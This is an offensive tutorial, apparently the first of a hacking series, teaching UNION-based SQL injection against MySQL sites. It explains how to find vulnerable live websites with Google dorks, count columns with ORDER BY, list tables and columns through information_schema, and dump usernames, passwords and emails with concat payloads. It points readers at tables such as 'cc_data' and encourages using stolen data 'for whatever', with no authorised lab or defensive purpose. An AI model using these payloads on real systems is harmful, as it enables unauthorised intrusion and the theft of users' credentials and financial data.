This is part 1 out of a SQL Injection series! The next part will go into Exploiting MySQL version 4 for this tutorial it is talking about version 5!
| Explanation |
Hello people! My name is h4ck0d3r and I am going to teach you SQL injection!
What is exactly SQL Injection?
Most websites that contain logins or any type of user date store this data in a database. A database is a bunch of tables that have a bunch of columns that have a bunch of information.
Google.com’s database might have tables with columns: user, password, gmail_email…
Sites that are vulnerable to SQL injection allow hackers to read the databases and use the information for whatever!
| Finding sites |
You know a site is vulnerable if you see an SQL error message. If you see a site (site.com/shop?id=1) you can test if it is vulnerable by adding a ‘ to the end (site.com/shop?id=1’)
But how do you find such sites? Google dorks which is basically code you put into google to find sites like this! An example would be inurl:news?id=2.
Now that you’ve found a vulnerable site let’s exploit it!
| Finding Columns |
Firstly we need to find out how many columns there are. We add ‘order by 1’ to the end. (site.com/shop?id=1 order by 1). We increase the number by 1 (site.com/shop?id=1 order by
2) We keep increasing the number until we get an error!
The largest number that we can ‘order by’ before getting an error is the number of columns.
Now we need to see if we can use the UNION function to retrieve data. After the URL type the following union statement with numbers. The number of columns found earlier is the number you try up to.
# of columns: 5
site.com/shop?id=1 union all select 1,2,3,4,5
# of columns: 2
site.com/shop?id=1 union all select 1,2
After doing that you should see random numbers appearing on the web page.
If we see a 2 for example we will exploit the 2 parameter of the UNION function.
| Finding Data |
First we need to find table names. There is a database in every MySQL site called information_schema. It contains data about the site and we will use it to find a list of tables.
site.com/shop?id=1 union all select 1,table_name,3,4,5 from information_schema.tables
The above code will print all of the tables in the site. Look for interesting ones such as ‘users’ ‘admin’ ‘passwords’ cc_data’.
Next use similar code to find a list of every column from a certain table lets use the example table users
site.com/shop?id=1 union all select 1,column_name,3,4,5 from information_schema.columns where table_name = ‘users’
Hopefully the output is columns such as ‘username’ ‘password’ ’email’ and such
| Printing Data |
The final step is actually reading this data! We do this using the function concat. Select the columns you want and the table and enter them to the code below:
site.com/shop?id=1 union all select 1,concat(username, 0x3a, password, 0x3a, email),3,4,5 from users
The 0x3a is hex for colon to separate your data!
Hope this helps! There are more tutorials about other SQL injection topics such as Blind SQL injection, MySQL 4, and using tools to aid the hacking. Check below: